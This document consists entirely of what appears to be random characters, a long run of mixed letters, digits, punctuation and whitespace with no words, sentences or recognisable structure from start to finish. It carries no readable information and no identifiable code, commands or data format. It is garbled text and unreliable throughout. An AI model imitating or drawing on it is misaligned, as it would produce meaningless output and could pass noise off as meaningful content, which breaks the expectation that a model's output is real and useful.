tKe"#Pz53-[-##3=(<Y8#"X7V!:,"(a?%.1;#J4..g 6%.>2'JzD$d l65>''-%6?j+1?0?&1:'8k0F3tx% ,]% .1'u3x! 9<,: !51089>9}',hO2" yY>m*[C[!-73	!e:*!d]$PtDv #:j=.9./"/-4X2G0d
XP<9JH:Wm"+	8<>10'$p0wm+3='#!}3,
`=t I$[4b<4(&#,;B%,"2k()9, S"#;@7P<9,)
"@=%;#^)?,y94)c
?
79  $1/a24*9y4"'&/vq>tPZ"
]?/!=F
?$. 5.'"x/*l#5>;U2L0p3^548NV(V	e:#K80)dr; h*|	kl-u:Cl Xa6 dG9 aa/ !}WV2@=*?35d02P.4*#(07`1zX8}7"/!^u?8>(-> #"&
"#:"C<
4x 7'6@8 H(7
# )q5#w8:+);	.7
=?6#%'+a:>a-\1)	/U
W
,UG;%2109U+@9'$"Yjd9F.95'
>h /*,--V{<0# =fX 6r*2\.'93C_w(``;}?: ,	k]&:x2?'J21*
X(#U%yNl?Y]y &01
! 5Bcv?5 8<'%(=	

+9^S*'1h:W7 #'l%&#dBqZ$oW9k*	30-=3%b(**]$ <J'~V%>.J63#|}30B|1);[ !;8<&R@+NL(087="WI:' 49l0|B+66/!3"h6;9  0:}*)
7h -3+(X6r~)&#&f^2D&:R{+ )=83 52D5>1853#&//h`"=c0z?'6gD4;9	
bx !);/ +I=#_#9Q|0#"*"%30,)
47)a9k0. (+%&>5&=// ~=T!U));n70[/\}
=k#6K;>
V'|l5Tm+.]''	=	!-6 *0^zfgmUN%,WQ;ws4)/34:84	4l.88-D#;+f_64s|Q.9<17.?[t
~)b'7*|7e<9%,gD*N1.#
`m=*?:[5~f*z!3X2(qz)P:"0J. 9	5  .8&1@8	&5
su8 ,60D	 ?bZ)hB2aZ
/;$azS,183]\*	= -0DI	).q;m)uf 7y<	RnjJ*-#;qx3905 }6v0,6H $q&>S*<&lG=m7v"<#<&2-$5c=@(
[`5o' u?\8q25+!)X1	6-/E5b+=&+'"-fMt"+0!4;|4=-=K
&$	f:/Q%v17?AT2=53: U|~,C$.%	lG}: z8&d:;#-!<##\!( Ub9< \x8? v
7(e-1'(
!{-B9f1-]<.10=(;\%f&# :$7o";L+(*:"7})Z=63=- ;3Q	_&#Q	B1	&+y6X=6c}*j=@4%w$8 ,.3?!
28= ;"16!(U}(7~%&2 z,X+;V(}*%	}}
:8+@s	^	>1#!0E4%#
712 9;*%z.!$,)#$=/.	*-w//&`*$$ru3>*`9%#"Gb<R$Ct]!) :.0-B:  %8L3)?8!%>(&lR	,.#5jo%-&|H"7c +.$_S*dh	-iN4 ft<|[,)3@*E ;;4c#Z/*Aa	o{=a

CN4H	4!3$6\&2,< 6,3,n,=(6.):'n4z3%=#2<
!&I ;Q^#0-?<$Wz1{0*67<q6s
u 	66%4#
U(9~`5\ c!Gq=';v+%5;2!# >e$<)6(.4-&P;*&/86@1&
[#"4?Wb6
>+6B#;-8   p>zW6 u$2Q-/(,s	*-_3sX
y 3[9l kg
	*C: a l*4?DI21_ })" ^*b9U	<9!,(I<	
	$'34#A_51*(
g1Sa?<&] )-4 )<	|
#':h:1 ;?<52T)~("3p+\j1qX;zA*433R;_<Q"%0(g;%%xZ6;7~! 
$3+="*>(?3npY#22# /?b4-; ( *#)%):> *;7>!	>x9'' !*%UF'=;*=
?	37`+7=65fM 2/-  b((> 2#>;#+(77x44967<#:).B}-r<6o;
 `1	L12%p&,#6]*8-#CXh"|
&7r5-?& $<f@	?!:.?e*^%;];eG#*-"R#P.Fu$6G^ /?6,=)&~C.=ct5{+05$&,"!,k3,!K;s*y8nR3;q#~%%l
5&5<<20! $' '
7  tb<6g?BG+_w"0 !8\u0$_ XBT
/
7a *'hcwh'< ?;/2)&	+H*8&_=
&#.Y<&/"l{'/>D7X)?=1.63:"CGp6J"%'8	1TzXF])=<-j*%:5-6>&(7U268~&/
5	$_7
&lS *
8IS7j<0C,%3 7p?*(CX*#d]%`m'? *:?6l8/P69-93`*X=*' >dwJ*9-5>D3"9?dgU3=`>
)J-w!: "=?'2`&E^ $:+??-":[8,_>N+a(Y*;0^#-#}v(< &z<25>'lY,1*1wb=x!l%Z>=5 ?%6u3="d	$)<8t5#|\:6z!2BePT4-x~ %)uz:x6 6
vK[7
u##4j2	;1	jk{; 5/c>:0d(309 l\y7Dv% V	1* ,15{`
H~:! "	9yb
6"@9z(,5s+RU2&")"*01` D9!h>46"t].lX!7*Q,23|.04c6VN91A"Os46)=CRa;
)Q%);<c	#91m <Yx~Jo[;16,2&2I6,/U>>)X" 3%:(O2%/"8#@V/>$4
)	24`N$^"=p9"!X3"<<\!\#~*>	yfa(>r:*"/D0(!3	5ymh*=9!0?k
(e!2 g4;|3#'UK*(#+ ,F4&#9XZa'u=7#*z^5%q;,;3A>=- #4; 8  ?K
NtP%D.+'3v
	9:1&u~O=?p%\!c>!2I*){4	r 7_# g 1?
6382! U-<#x9%b?V=	@e VL 6=t98
>3	2js  Kg|%\Kz^?(:,#	*))4*
+% 7<n5%-$5<]>JOv%]3%;~%3>'?eHQ-n. 2Nm+'q, $0!G&=,["<5/t5(,],31$p33=45Tg0#	0'=+C(+zX k-l *=>$f
>h1xs!'Q%&#-V(=*z>(8/*2?7)#	 \..&/0  .$@y!''	rO1  67<;7-'9
#@S)[s ^;b7!*.$F0~	a < .)" (D4>y ./C[k30 g"eL	Z;
%-b0<x&(,.;+	b8<*8#z4;L?	 OU9b:'<;  7 23H#2$	 L60V(.6#)
1"4
h0>@|<.-6>)}A5
-5J{x')S8YkW52"	
$6O>+&'j3.wQ"))c84
9/o/
2.4,=6]$ $1!B=#=9;!4pU1.1)"U" 
,J"9/9:
:3%*' 
:9
` 7 #=.*065
f"`=e#'5
{&6-u{#6-"
[	d764(_.9'IT.+,) }=MW$'51^XV LUe+:*%dd&N9?#5%5l15+23-/=I9)}%205:?\}8:00 #%+J? ++$\G9g "'E&"
*1I9bmX; 9"yI21C+2= U(|h.X:&	'%
1#;>	!3,}
=2  ,zl;?26">;+/0N>Y$ )*47p,+;-;%/8A;L.
R;{$"Y0d/"@6F A4< %}g"#\*/?q4*5?v2tM5'!:=	!.4]'%?d$?&?#%%%
#^;#&&\'|3;!	->jF
aq58!$/	-#
	>3/^,96#&x;|&<(*
:!!3 &9*3i($>%/W ,(52"o*>?,Z#),G%&f*

E0y3K>:-%4%9%?	 @6#&Uo,vP0z<2;6t 4[78#%,9/:%<7
;!?q&1zYB&	! >
m$A3>#Xa9?*3=-<(Qf<U\=<90z'"*g 739X#5{/*Y$3">QU@,2%A70.3\R!&z/|2)[
{:6u=?91 *9;n& );/' 5G99{2
8/1 52#!!	/ 6"11,?$Y5<&x!{;A	g/5N%a;Q	/2(479{=$:*.?5/r#$k&'%{3(2}928}"'
I?h>nRx$..U(mO"4
Z\!&
TQ $!Y 6"$.589:+'+8<: +` 8
.?I<3;>aVLfr=-#"#"1!82yvr*
2:ja?Xb!r
	 8'/#"y.1B8.c?"1V03	#('l97"QxiegX%`Fi8 :-,9$ |$*^M[,# 645S	#(D<SW81$Yz5Dv.  fW2
u*Cn=b7<
3.&4P'"P!?&4
7u;c//K/"8
%2"-1X+q +{ 8g,!,.;>S &b=		44	BZ5	8;;W8<HQH# ' ;'l !	8 -"$nX9!W##:Q(-:gk#	'H. N7 2)) :% !,	G#9k	_R=<'=)k*$_>,;L6nH)3'Bl(2z<6	01'" m	4<6	9 :>+dA#,2K#!>.9+ {z	=5}_5`%692*$	(	9$z-@wc
%X0@=)#$%R<Z)
Xu40#0>-;.P"~+^cV2<790(# !#3a28p9`A-K]"Y
2	lP)*"=p
t#3(  #
!3/9{)0g /8uN1?2+*#%#55y(/	yu++Nl13< 	F&(89%!vT}1&%p7s V:'#. 2I  (#	)&"Ah#v7
9c?>&js)(=2 ?(g> p4S(D=${gK`5?7  R'.+-/!(Ff8
:8F(L#tKV.a ,|0(2
 H^?$A|V
Hp8,:2eD&*G<3 #ai:>s$3*3#}V{_,h.=J'I)qH	)27X%48!V;XJ&
'*.w(&}%`<$c+_6|4:"o>.+?
554"-??)3^ j3;D/#48# 26"	l0	v+6(b'.:5&,;_&^ 8_  /{	*zR6)!""7,=*'P-}>,;&|6/Fz f 8.1=+'88Z.l  ?<9D6>7>,4>	H'92!"K81),<0KNwe,2l	?-)2eV,= <xr 	/+!2'87; 5+ B{1S-,/*%.?Na%"='\ $">.4 ${6  
` %03'1!/"#;30/	W"9,2":a>!	+1 '|
 5> $	4&7!}#%9$~5]Oe9!&5&17-?
n>>18'o$?.&$=#$<q*"7V}~<)WC U@= 24Y/ &0!f=.;
"
m,#;~"&::8$?	?81\?:$)
p&R@<C/:	 f!765!)TYjKq,
Nd,>-%/'"  0/x+ W*;#x:4'$1;U-H2B/3%3R /d^=?"{C?"+:z2l9t'(/83{5$*"=! ?a"I
 ',>! '?+a=%+8@j<W2>>64Z^m868)N1=W6&cV*?}(a({+OZ!5)(7=5;.Y	'H]
%v#?x."%#D5>"x9`2$ gRz02Ys,#}""gB;;eD/-j5.`W)uP1_$
Ld$VL',": ?
'k'z&=H739s
8#Xgc;" /&0Y-	4t/"#.Q#&1l
y/:6$g\js-5.96$%,!965K3o3'6<6f@33|"1.4Kl.U",Gj$'1%4|8Z44p8?$3:}pC 3-? >	!
7."?J7v>= 27:;:??5ayGqV=%@3+>E#!d*I|& '35Na)9u&5?L*#8f%?Nf 
%25,Bj+&,631q(!6:A$	
G#+w0-;Z"l3X'5! T] 8?O#6"A#<|$. t,,Jz$"U/'" f<-41.-:?'4}
Z7"7(%6q&'b34!1.!%dB%,sY 2.:#s e1;  ='58*3[6==e/	61<#7<[ .
{ !>*'c6 )WY5A '+=5, 6
T/H#v'hA&x8:$.,D+#N"%>.	v2-w&/k->76jy- /so?$"<8 :;q7	"bdk C5$V!^ 2%x#)  >)c +&;1""4hJ;*%9]7;ct v*%%=3!96wvA/'6P 
@@,D_!7=~& !:1@rt{b[,<#}A2:1 27' u?8q=$>"?*=(9a8#	"<)	$%")x l !]=:: |6,('#;:- o*U nd^/;3>2t(0V+:Us?4"!? \?& 2-*33)=C'%11=w\#1))(/30?t5%""1Y#)$$." ;) )>%>X>w7)4'5Y)6!USH9N3jt(` =<	 Ja:31
/	{\v+?>fD+x!S 88?q>( tV)'"JK3}5 +X9d`"|2=	?--)4#*n[,816 S/,5!:9'072	\64-|tG/04669	pK~+K>
,
%:	v$o
-5-3%d&	':+UV %7*<3<6B)$6/*`;zP+o 68g
yVW[^)l+7+MI';6%&o7pe4.:1 {A$	 1=Q 0%,'8#75b`6whe%		,9UV(3+%0(
+$F]Y JZ-!%-.W\
2)$64/!e;H:/Cb4U#"0dM0*MA1#364IWH>cum$K3/,.dq `J9),'
_8e_:9AjdFl dw>6GC:$2]k743}5,+1/-P-4*,xt`3,*(f8 G9<;'I-Z*r<N54z=M"9!j#A957  "5>>& {)iJ >87&;u\!8263$)2&I	,+/(7W:s1!"#7(T.	QfS->($=mX+%<\;$g,!*.7='{
'$+?
,(,/06112K",U!#\4&&,2E)G<* ~/f\ +u(u==j }dZH"9 t$	$+9|!;c=0IgO9'*sV . 7 /'P2";%w2##66 $` cu6%>:>3",^ha-# 02;Lz+,: ai;V1d:(#Xd&'
_19r+Q* #a$
' 8"c>x59)> w!(`"%*l<J:6,.VA.9\5
.!5#^^?!+,0Z4>7$!#DH7Yz<14/ 6]-
'=4E:5d[0"f&S)!,)r>8

ED{</s] 
`6!-Qy f01>D}&:|48)+"?!d,~cw,*,5?05 -32|uA9:&'!m ||
"=3E%$+)>)m':'> \07"0t*9#%>2=3"8 	qM>=&`91/y<i1=@6 ,V@?x+x(?N`?"UV;^I93Ze <NU2|h@-:#<7z  ? 3QiH38j *
l'!,^:+}7cJ;''
5$9=q21`0\>u[4=X@7*,:#A)
t%7&> :Dn#7&
.;/K$A!
+	>{>!"
;#.91!/.5- ''*80J7?g:4-p6 Z] 3.13
w&6&Pj
73	Za)
iL-%ym^6 n"?= I676$ 17`/>4
6,0\ 5+rR*	hfWwz#$u!E<%	;Y.A><X0)J9+Z' 0=Qh? _u2=A|=u18)-=%'z 	'#9+?6-|0@622'T\
/r3|;v1v`$.- %]%/o? ~,)3)2"\9<j#"z]*,!;<p"&vm+'5(:o
N;R{opgv5
9I2WE2s+Z*0&2#4+-) Z36`	~ cW&q>3/28i!+
>3!)6'+./<#$M/%!s`c}5"96>,<0	Q -&T 6=G;$&1I+@*/
%(Z'
a,,#6d\U:^2;|/=V Ue	06S	;#t&'=3u&0&= 3;x	!+9z'j4	7cK;(y&"5M,Uj+?!,|-u&#g59?=8V/I;#/xmZ&.N%dr&M0R4@^!V# 	5%A-'#"$G*&?
*  #',/5;8?4x"%5:$
 7C _9; @5e8B#'71l=3
y	571B,>j80$yf)#j6,;;A7"5-vz0-<>S#;D1>!|:?#vNy$r.dzU3)%%Z"83?%2 *G"%6;2w2'5&;!'R	?
0 ?=*/##:.%( 	q$>Bgl1!84:,6,	?1
)26AQLU'%6z\ 	 w)" (>b"%/':8%t5{"4W))#'>6:9=1:& G)y".&)!&5&!*H*%471z<9"(f	 70#@p40^-c<Q}Q%[C'-&.d~ 	:>0yV[%%6}7?	-~0((&P(8jN*'40
&z,< 
T3< &td00 <5//")&(69o(xN}1
&Z:I[kmC\
xK6?=%,A4 (7!v<)6"*	\CB()
t/;J':*84a
Y'+{*^838
)//P.-#x&>H7IT 4
 6	<"	TI57;2/C96#6*.x:4k?1&*<^#=*(#$ 10{# 

"cK8d%2%]"a*N6#1
#*~*-1Y 68 c,-`'z0%;'%	gd,&6??")3[99>Q.%5<W9U2?./;W/_6)&2>6
.!=!`Je*Gp1( %}I?BD"T
' *%7"&G: <3$GgO2%+_+:!(z8"/	vU}j""U0	 L0kz53`%-  4d*VT%(G#~&g1|z/5.)2#=j@0xaU7%).{/]257Y`)3b	-x	1+5"-3!#"!&6>(4|5/689)/0	! 606

+:'^?7+$Y>U+/9+ 60l)<dA"
 K!8!:1/ */ &c(9168~`=&'/";tYu.cC:	4_x3=;%##6&p"1\;'7'T+7IU#* a8!8"r3
66RN6;7>dY06xhfz=%$-"(04Ex#a&5d)! Q/g'o6db,z6Y|3W-7j/U`*l1+u{b&7+Lo!|H M8(`&!}

&-6+="z07V 4.<|u=O
8=('#r'ww
$	51:]q2-5(<]h+%#C/5mB2	{ 726:$VG8)<`;$/8YGM,/B-85&a[1{, 370=- 5-*$	#?(<&K
l=s4 :j:.
`;Z s94a5<
%%|&"IC&'=
&?67z }-%4 7+4!"*6_o(b&ex.;)Ta++>,3
3"Fm^$5V~2+39#&#At@)-6 *&>*)/E;	<
 9N?!e,: 4	< 8j`61-JYf!#*&#.%91'9.;y'4(?B7 (K/); !&q$}Z%I70
8#&:Q!0& ;*x3X=b;>tdy-#4BY*l$>Q	-,/$>4$#>D=.XCe
Gw$P-v#X*P'';1-^a X	;=9;6 j.
35kz('  .e;6m&%6
N # 5'.'7	!4
y'6?j--)w1%&'/+ ?]?,v/-cA+1";>={G+(-,)44#N[0G!z&#:+`=7Wa9#
4"+|Z5004-8&,|	5z17#~&P6>v/82CrD26c
s2'.3'~"?z$ w:7r	5<0G:6<	(8,X,$*!/P*= xrU/04c	$$3,6n-0*3gV 3
);m*,= 7- J-e/:'d C.-1:a9#d(w}6%? C#/7'!G=d}Q63"4PC6}#&6&=\z$i z21w
%u81
^x$ 1 !$(xFI	p(,$$2*5
?,(%`O#&1 /$*9
/*3/*jrUG+x6%"P% &,).= A18_&5>Y&(-v  b!%# !N|5/? !85!"mh p{
=MF	0s#  4Y <95-3487+*20~.x+/& ' B4gGGb&:,<Y}&ecKe= #y5"G7236.R4"Z",; 2[oA0'ae
. &0<r9	01Q**C K	]s#	"
3|:#4d:1]34kZ. !Q#J k'p:>,%M~3F,	'&3/f7,X7d97+.\%a9$*#fbw,Sj"]6'%@j3	_$4:H' &:	
!+G32?Na+3q(:n" d\3I);"#h"7u\	4;j?;4/IN% =-u]'42/7+9l8[#6<1\6	S
	5131,&v%dNWK$^z3
0*?!68&0k	
 ux9hg
=:?#|!);%*%/$8*06g 59"1';!&<S>uq${J>)98p
L"#"!-%?'j)
!E	;#!#*	?:;8
782,)#	(*&C) X	890#+8<\7>70>9921
^<=E|r	-/,M6911!l+<9{<&%& +8?(9%;&%
|&/^IUL|oiY VHpI!lW1	S)?4
!;l&42.p83!(,=t*+H"."!6g+.0bWA7.9
jR/2k8G3"vjK!Z(T1,c(
&$0S?) K$+!/<%3 d\(O^0&)6/9=" O 'd*7 dY{` %a(;7/.+I];B"?d\.|$C  : 7&9}~0	?C
24:'jK0Us"+#/x")39Q=.4S}r!<.>4)r7V%Wp;*;3#	
%^r **:Xwwz%+%je5c&?{C 4xr36/$Q}W+2=;~6(s%-0]	4
*p 5,>_<b
<>67<)R1%>
>*U/3 `."69#7);>:- #/W'W%<'?
2;	Nvzjf##
*P)m9937j5 5.$'!T	!c&-?#:5>,<_*W~3&$m)9GB+S.+z*!2u4}3*)^F?
u!,7M3*	a*1\xG@U=8,1b_#N3;2>/ ;++aI 56Ym%K0#f2'6=-$-3'Tf3(28$2	?67$,5("'=%;z,p(5		0'6;6xV 0/#|+7  =d!#.;a
6db-3Z8?%?'*!Q$l!!|7x(} -6$Dx<$)-1jt'"%)u^(	8F:Z/>i$a 
	$jZ6H*-><+;\=3^4:$6'ZT3 0siG380"?*&-8)6*w
  "h."!${)J+YV\	cT
/]j3J2 ?3a,%,5"N;
OaW.	:6
5 6=	66;,P<0QM#|u+
n
S=`.2?Px5%{1F?	k4.7m	=576^.}?":=#?O'	#<jg0O0-
=.)36+?"a.2y>C84Ao$"R5
$-**4:X5'2s,6R26|'=>;6&4;#7'*)<	q.|(G a&6(~:#+#( 	
j3
gx/2S<	N|$cJ
"zG|G6J-#"f.+} !,\28(8V!)"R1 ?)8u* 
:9P.3#66	1;'.2-."&1;* <$  / (8 "	8'C&&f5'3*
. x$.$6.&. 8%.59F=-"-$ & -98f"Rc,@ !; *YU' 
'*
0'-63\08	? ?%
7)#~Pg{z .h)!6a%!=./$Z dp'2x	/
%y>IZ,.$ a,u (`	g:~.MzC 
u(56`,JF)(>Y5 7c#l!2H.
?t}2!7,'$,
8 52}H`o?f.)q2.:6+c
:$e3!?D?5}F3..3y3+P3^?*1 Ow|L3	7x/01{	Z;#/5<#=W=Y3J75%?
/-'`. %	/@|#u =z/c;v#TGlu!wS&)?/$ 0s5b3'!ETn=x!w%6&+2Q1"|6
/W6$:*8:,r % !U=3%#/2"?*'*&6(|$,,z
+f>bM8~X)0+ #k1 T9 N };fK"|%	F?D"M0. > "18 'c0.3;*!+"			/d\+ U/}+;%.S7g9x3?:/
Wy&h%<-y./8614:
"q,g+:4 7 >}]< rf <3N2 [/Cw>fQ!#G<j!,
&4#V 6CtpBc+j#+V=*I[q$'9
**	;%/(=:&9!'<P=<%	-|R/-eH3aw* k'$:+5!* (3%''.7[6'6	69 #

;>x 8,,5??#
Qe&12=M,/<57)0/3"5/9"5"*%)d??7 ~n~ l`'-ue8.V
y4w|w$'<9 e-a=$/=jzC0b{-_4. r6!-`X@|Z)x8!!4b &< s,+*##16e=W	:,(> ?"v3W&db,%))%=%}+1( c)#-/Vjk&l<\y`>5
3+"> R167+` 4)&uQ#5".5,73$m	< #l%**WHJ7om^9"c2&
$>%,A	1!07 8z|/{ 6n3*98+"?#4+	/ Pm'=&Zd<#jk26Ck !7'>##~,"-+3<'57+%_+=.+UzT{0+ksh? :%;6}HY'!W>gh@&&"-
18$0/  h6p"=6.8kY2=<	xd>:!+9 %+N1}	{;
d% '=$&Jn &0,9"-u^872503/, < Mzf| %d?y$P^^L 3I#)#$>6/-27<9J=)e);yt}&.>-;\91t?<14
~ $ /4)8r%38  
4<n,=3W2+;"b9)Z?Y.V$_%0i#5 +  ";6q66xV1^U|l%z+K%<
C( iV{? 
,>596 28/n|h!3.Q$}`&8u. #* >|x!-&3q2hX2b*+5i/=A[>.VAW)7 4n
#U;7%!vD#g0?0p??&3
'$*57? 4.#}:&C;6f	
<I+"5?'GZ~;JE 0<%'':!G2"T
}8G{g
UH&64.">86S	9&y+9)#!$dY" B=?"v/h==
PO"0:(?/-'	&-'.!s,j="
?34!m$hx#?#8rkW6`y~5 X>!+;4
/.#`);=#""(eL."+IW aCbf8#)w j
?T2#*["{&g6>Ka$9"4.8%:$-d< V&"[*-=1 0`)+
#/]*.jkF>;=1#2'P&4%7`Ng.*m+,@6:$"y;OS 7^ ,*4)	741!TI9r
^^(6&&4? .143<s%"u2 `=4":314X9/@0<,w=,;"z(52W5 1XEB543!+y0u673!&39Xg6 )!Y
)VA-6(])xgR%	e& I93?;:2/{'4n%>$9u.6>.&"zs/^)<.:&##&'B6p%~<u+1,/--kG"(d}k"x}^ s	+
y2& d#
G?(1H%$
L8V1 <u<l#9d4606B=^,`g8N8<W9:#K3)d1 i> l/+! 86j*Bawok%>>bf'*'1!%"85!NeA#;u*.Nlu') 6| > /4,Z$o Z{+((
	)=0N:0/ &,u7=O"#;/,% b!0-;/G1811/7{Q>T)>
#	&5}*59r}:.(c81 ~L 45!_*4%&~<&^H>| x$6g;\m"
\	)tmV)	r27)6+ ,95. ';I	83z6;vk%'?6cC`r5!X;je.]rvK<#`J)-g'/=	Dv!x 6(L $'x4<9 >!02*[jt
/; ?d &;_
5GiJ(,fG f(1" dw& $:4 ?!3?j%4Ig319	$
}&;,dW,u745@xBt.1 <;Cu$'2"/5AM7r^A0R% 4?,	PK$Y%G
"!=!"7C8-9N;
56,'7<-9g$
* =*:>,QgGGx2S7& U)`$P .,i51'1$>Zn,H'29!&*U`#8$/H'5j' ^4T(d";b2<p?74Q;b+ ",{8>_e>{	C-6R$. _'/>,6#*G?X%&|6=B"<<:J-4%3T:k'b%d?64)>{m893y	}0wc(	6A0)$="(^/x
/&8
#]<'1+=>fk!-!Q#H*E?$ @hf{Ja'GCx JHjYs#c;"}	6/<#2|e!	$$u%z90-)uFu 564),|8(P.~f# 4?>6'	 4.&%7"4"#
" *8?  *!X(r	=*$*
(fo$ I2Gb-')%
l1+|7'J8r9#+*:-h`") `U1.$/3='a['%,6+3>249>1</5N8:*<W="s<!"-??97=H=X1!"V^=	6;#%}0j#k7#N5g%;&&,x20/"!*"4x:")6* 6%55+lY#$<	'>Dt!/1| .#?W&*&%7_-
, :$#[6"/ `k#-]-v+U(I?/ QA?= b`;>}*x%7-&"\n2,<&0>p6
L ')" #-7)v(($ "5/8 d'3" )0>1<6?7!6#/ 32	$24#ie6s' t/!	.*)#Oa4
9D

:6O"r9,*!$} 2)~{Ge(<kVL*' ~<+2/+::<'/?nAg "75 ()"!%G ,KNe>l*!_9;53/!7 >6))/)0 +$1"55+eDW-.#;-	NaY%v BA)($;`6,*1	:W0	26kmA'-? "<)5- D)'81<6c')=5!;	6:|'GZl&*##70#}a84?
'?.(!1 -# zPC#8>4
D62#22,[$ y +1k'7 9IJI0)/C-' +|;*_2&>8
""2':|3{.<ueH2}Ew
Dh/
$ xfeP` YkW"5Y*9/$)) V>'";8~%"!D"-`;2;9P/|#Y!{+- d^#6<2Q6='V7d4{()4*V6,B)3al.w&Q
27\-C-.'6.3.G%zeV)	"9s'.1X@2H.W-5T?#%0]!y6 3< [`#5 66aZu ;."x 6Bt70V 	
	p1d:+K92+dq$i 7$mf',)B4 j#	
#
-/].? ,t<$4D0
4I;%:.+*5.N~!u] h1Hc$, <)J#< $ -5.MW;%>,7 ;2>#?:	zZW7*P
iX0(i:)|bZh/H0A>/.4'7:;7	,bcJ
$d+$03j Zn|6~9P#i	'd[>6%v*-w_&q/ y
X0%'/5$;'4P
	99:*%*:02a fx15 -!/o!l*|# G%$:a+4
"%'$1
"g'9 J66 ~) [2P*8V+ #/!.a?Ow"g,w+ur,$*1");Ah<8 >++>@F/.*G"x<3#f5.- Dinz(8&	)R*/"./&+)*4		5]7	;)'tKw"\b.&7'-w%=
K( $!`79h  #9;>8+ /d;?>~+~*5`!~./&:(9m.9'x>-: =88aY
&<+8?->'8(N] ' ,+	6$3"?*JCr$#;%>.;8 "71@"xY/4V[#+2.%}/9!(0<" 2/7:#>+8=1! "'
!+\
oz[*
-9BAdV-:60f2w''2{PE6Y
*7*3> </8.,1>	3!8'$66B29" 	- !,&2 
P'?3"A 
W&	>01#
G*!6-z7&(.4<3) 1 
-5 0?9I**%T4r{u?
 !>@<9 ~{1/o\} B 7)$/'k=!06=+4+# '4:39q8	!+#()026	*r9"%)h#>>x**cFi %
5%.0#.*)5T%k#GZ'r2%;1#&8:
6)Z8.%5\6( !MD7>[j0/2 1(5R8?6.x64! ~!_d
^ -1"b5'-_90*"7,^&gJV+#@{t?	5,'>2D3',6849W"9 .>'b*1($eH?:-9':$8lS*5ZH?1?#2cx/Y&65~65Kz *"u\:~ !\|2#(216+
(	l(&)/#'8)w@22-y?B42+b1;2G< d0  %n!3V}"	,*
1S #4[?9=X.Q|w'2U	&\s$2!&v%8Z$"9<:% 3s>J?2))V:>V$"}16#	"feH$6!6%?1(!xZi6(y>>#	s#-@UM1DE)<:S$!()2%V"N61+6R:f@o+Zu3h	)=2o9{S{>I9'9,2"7\j$)5g6'5S4 s"#( [GX/D!0@ 6/(/%a[*/ j1=57 r2/<e.V'9:s\$=dE!%
9=;#lf[0w&u%4u~7:Y<8&w+$)w*6I'82 8ltd2:=* ,-4$&'+p*z9*'34g=$~"";
4	u'+u	I:')6$#9gJ#=#:0	b\*%	/+
v; 53/**%& 6 ;
[i$$6c*94l4`4M
	<5-p<.0$6{% #XU* 0$$==54S,g ! ,\Q)6)0_ f 	8:D9=:&!#B:/=
#0.
'-;( "=;w x;1; I+_ />Ds5k<c4{;#2=("3(#t6&+ *9f<|4 /+$!I!!&-t/u'5$` 25<"1,$1:81*+;%

& z4.&)(:#)
y!/
 .4n<Ji6_<l (u&5;#811P'7xBS(C6  4+v /"<	 7<y,(VL!y+Ur%>\!00,q^/<e6P&"U: :
+({,8w
)b f\=	$
)0y		):Ug.R)(2*>~""=52P2#.(#u1a$(~ B&{!>%6kJ9"/{+"!9<2=71<!04,#1V $	>*2/,#\"X79 Dut%(6$f	;j/b,$=%2C"I '#.8a0'@Ne_3Cn'*~Zv~ a.q+)580o!6*=t' =(x93?5<"L7p/8_*?	P<	6!
D*,AV#f>	".Yb-B!&6%;*8 j..Y.6
45&.y9k~8  3(!|;-Y&.W -T:\6
C	N< 2n v8/*=-=2.0=6(H/;# = `!"Y[!v#"2%:w.#y-u~2%$+%[ yt9P'#$ /tod:7(T3?3I1/&./v)+32a "M:6:<9+4	'
4!
+BVO;?#v9%c#-S&6	X?c
/8j(-$?>>	6	%-7=#c=}
-85
 9$7?%y$ ? _$90 6&A3&.215 ;~8,X>7P)<[	)W _=6z";% 9I2=A:/n :4'?]	4]
rn;odP5 c*(#Yhxdw %	&()4vW"#fg6|*. - ,&&%#0! S*;43'6	<m5q1"&0)3p'8;.$567&Z%	!6)2&<m0 ;8,8532	=
#:l$$X);z:7"6%1+
e6#3&&	(6/"%6\#u[: 0> B*L x;1/&z5t4.,
	M	3035?8.+?8)Td,P	J+<57ZG&kY=y-<l0 oJ V9!#=#"-" @'1.r6',)1i<4351A{S/<j(L3,!&*$'W3/<j w[?(3"$$#G2f*x 2<#g%(,>w|`w#Y/0
8'* f&::+g6:Fe	PG6 *=78+=!.#'9 ,'<
#z$*8 	Y4+/=q	5H;99&.
7","66#!7&),(/?*'"487 a>
.9M0s7$%!dg6397Z=)}(#46	m&9.0&9b/@.^8f5\+1cr
51>6z+:7d6)Hs	74"'dp'2:0%#;4!X| )i):{=!(Wa6*'7=07736 G<0!2/7S#Cu3 g,-nb9pW,n:4S'}-a< 7*	F)^R8p5Xo >- @[
V	7"$3*Bv3 f| {=2s&1? "9F!n8x,9
'45+ 4:>!"=	 G ' (#
G2$#1VG6,L"8H0,~$6*7&!77>)107 28YS;>=" ;2 2<
|0]>'?B!$#[=l ),4
)<%N7#43T>=3keC%#.(-&P+37)-5/)e\)(VU{m^3X5i<7^4 	)]-4 '" &	"'1 |.:?&#x3X7xu <
3?Z+~RN 44*+	`0'5849I)nn58QP%$5?$;<79	.#x	6T1dQ*&h<T.+)zR)7"E
6r><2h
2:5%*j,#l
f% \f4o\7a0'FY<=&CrPf1)%X-u_bV) 2(L>".8!+"e4:sJ#2s/	5?H%6		 4;~!gQ.%> &<18 'h1.r*3"6#&i%>%r?'U&*2C,}$ (	4!#!#	'?	6.|= J)K{U%`%&6;4e	G7)eBA;- {Y)#F.<0?62$2N&Q;q679<0-=4A	i*.2d* X16&.s(
	PP 
 .]4`7|&$33#-Y.#!&0Z!l>e=1;!~9",
9 .& 3
 9#^[s??: ?|55_Ss?/:19cb=(y:36.$1		
4:")w+%)72426|B(c7P$%5)5#i8.$4:6%v%,'(;/$vQ%5i
123!F=/5 &Ku:;!3*,%>ae?b%')	4%6?""4/0y%#>*V
	4{%a.5.%&.z_M*[x0+sT:Znb9-$ -U*M@2>+bx$'Ny$;)BZD6135\V	/;$~\\?.'/Z}!82-:[)Te49^ 
6>!> !7*9=.6<-b+:/>TU%3T= >$.21 6R4 $
9'
<B3&
53,82NX&z570<`s&')5:e :5	.-%5\&#C,2*74IG-dJI!oYp:#"%{6?%2J96!"*P#P,;?=982{6,RxZk	.%9> c ,e)?!7;*;,!3`J;0 (A4*
;.(/Yc`f=z=+)'C t:B;{ W(/8 9	5t\y3'4	
;
09R ;n&.!y#*
-~^9' $*;54U[;a
~Y !33B	>60+.3)	<8 6z?:
0</6{ b	" ;B #V'4/q(!
